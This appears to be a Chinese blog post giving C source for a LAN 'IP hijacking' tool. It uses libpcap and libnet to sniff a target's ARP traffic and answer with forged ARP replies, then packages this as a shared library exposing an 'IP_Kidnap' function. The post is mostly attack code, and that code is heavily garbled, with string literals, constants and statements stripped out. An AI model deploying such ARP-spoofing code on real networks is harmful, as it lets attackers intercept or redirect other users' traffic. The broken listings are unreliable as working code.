基于ARP的局域网IP劫持——C语言实现


 

  

 

  阅读这篇文章之前,请确认已经熟悉ARP报文伪造的方法,可参考《ARP数据包伪造》。  

#include <pcap.h> #include <time.h> #include <stdlib.h> #include <stdio.h> unsigned glTargetIP[]={,,, * glBpfCmd= unsigned glRetargetMac[]={ ,,,,, * glNICStr= getPacket(u_char * arg, pcap_pkthdr * pkthdr, u_char * * id = ( * unsigned * src_ip = unsigned * src_mac= unsigned * dst_ip =packet+ unsigned * dst_mac=packet+ printf(, ++(* printf(, pkthdr-> printf(, pkthdr-> printf(, ctime(( time_t *)&pkthdr-> (i=; i<pkthdr->len; ++ printf( ( (i + ) % == printf( printf( errBuf[PCAP_ERRBUF_SIZE], * devStr = printf( printf( exit( pcap_t * device = pcap_open_live(glNICStr, , , (! printf( exit( pcap_compile( device,&filter,glBpfCmd,, pcap_setfilter(device ,& id = pcap_loop(device, -, getPacket, (u_char*)& } View Code 

gcc name.c -lpcap -o name

  结合ARP报文伪造模块,下面给出完整实现代码:

#include <pcap.h> #include <time.h> #include <stdlib.h> #include <stdio.h> #include <stdio.h> #include <stdlib.h> #include <.h> #include <unistd.h> #include <libnet.h> MAC_ADDR_LEN 6 IP_ADDR_LEN 4 unsigned glTargetIP[]={,,, * glBpfCmd= unsigned glRetargetMac[]={ ,,,,, * glNICStr= ForgeAndSendArp( * dev,unsigned * src_mac,unsigned * unsigned * src_ip,unsigned *dst_ip,uint16_t arpOp,unsigned padPtr[ libnet_t *net_t = unsigned i= printf( printf( net_t = (net_t == printf( p_tag = ARPHRD_ETHER, ETHERTYPE_IP, MAC_ADDR_LEN, IP_ADDR_LEN, arpOp, (u_int8_t *)src_mac, (u_int8_t *)src_ip, (u_int8_t *)dst_mac, (u_int8_t *)dst_ip, padPtr, , net_t, (- == printf( p_tag = libnet_build_ethernet( (u_int8_t *)dst_mac, (u_int8_t *)src_mac, ETHERTYPE_ARP, padPtr, , net_t, (- == printf( i= (;i<sendTimes;i++ (- == (res = printf( getPacket(u_char * arg, pcap_pkthdr * pkthdr, u_char * * id = ( * unsigned * src_ip = unsigned * src_mac= unsigned * dst_ip =packet+ unsigned * dst_mac=packet+ ForgeAndSendArp(glNICStr,src_mac,dst_mac,src_ip,dst_ip,ARPOP_REPLY, printf(, ++(* printf(, pkthdr-> printf(, pkthdr-> printf(, ctime(( time_t *)&pkthdr-> (i=; i<pkthdr->len; ++ printf( ( (i + ) % == printf( printf( errBuf[PCAP_ERRBUF_SIZE], * devStr = printf( printf( exit( pcap_t * device = pcap_open_live(glNICStr, , , (! printf( exit( pcap_compile( device,&filter,glBpfCmd,, pcap_setfilter(device ,& id = pcap_loop(device, -, getPacket, (u_char*)& } View Code

 这个工具的验证结果已经在文章鸟瞰图中给出。

 下面,我们将这段代码封装成为一个共享库,以供其他程序调用。 

 
 #include <pcap.h>
 #include <time.h>
 #include <stdlib.h>
 #include <stdio.h>
 
 #include <stdio.h>
 #include <stdlib.h>
 #include <.h>
 #include <unistd.h>
 #include <libnet.h>
 
  MAC_ADDR_LEN 6
  IP_ADDR_LEN 4
 
 
  unsigned  *   *  unsigned  *   *   * 
 
  ForgeAndSendArp( * dev,unsigned  * src_mac,unsigned  *     unsigned   * src_ip,unsigned  *dst_ip,uint16_t arpOp,unsigned              padPtr[          libnet_t *net_t =                     unsigned  i=  
          printf(          printf(          
          net_t  =          (net_t ==                   printf(                      
          p_tag =                          ARPHRD_ETHER,
                          ETHERTYPE_IP,
                          MAC_ADDR_LEN,
                          IP_ADDR_LEN,
                          arpOp,
                          (u_int8_t *)src_mac,
                          (u_int8_t *)src_ip,
                          (u_int8_t *)dst_mac,
                          (u_int8_t *)dst_ip,
                          padPtr,
                          ,
                          net_t,
                          
           
          (- ==                   printf(                       
          p_tag = libnet_build_ethernet(
                          (u_int8_t *)dst_mac,
                          (u_int8_t *)src_mac,
                          ETHERTYPE_ARP,
                         padPtr,
                         ,
                          net_t,
                          
   
          (- ==                   printf(                               
                    i=          (;i<sendTimes;i++            (- == (res =                   printf(                               
                                     getPacket(u_char * arg,   pcap_pkthdr * pkthdr,  u_char *     * id = ( *   unsigned  * src_ip =   unsigned  * src_mac=   unsigned  * dst_ip =packet+   unsigned  * dst_mac=packet+   
   ForgeAndSendArp(glSendNICStr,src_mac,dst_mac,src_ip,dst_ip,ARPOP_REPLY, 
   printf(, ++(*   printf(, pkthdr->   printf(, pkthdr->   printf(, ctime(( time_t *)&pkthdr->   
      (i=; i<pkthdr->len; ++      printf(     ( (i + ) %  ==         printf(     
   printf(  
       
  IP_Kidnap ( unsigned  * TargetIP, *           unsigned  * RetargetMac, * sendNICStr , *     errBuf[PCAP_ERRBUF_SIZE], *      glTargetIP=   glBpfCmd=   glRetargetMac=   glSendNICStr=   glListenNICStr= 
   
   devStr =   
         printf(    
      printf(     exit(    
   
   pcap_t * device = pcap_open_live(glListenNICStr, , ,    
   (!      printf(     exit(    
   pcap_compile( device,&filter,glBpfCmd,,   pcap_setfilter(device ,&   
    id =    pcap_loop(device, -, getPacket, (u_char*)&   
  
     }

  编译后的结果:

ForgeAndSendArp( * dev,unsigned * src_mac,unsigned * * src_ip,unsigned *dst_ip,uint16_t arpOp,unsigned 

 IP_Kidnap ( unsigned  * TargetIP, * * RetargetMac , * listenNICStr , *

 

  附录:

    参考文章 《libpcap使用》 《ARP数据包伪造》

 

相关内容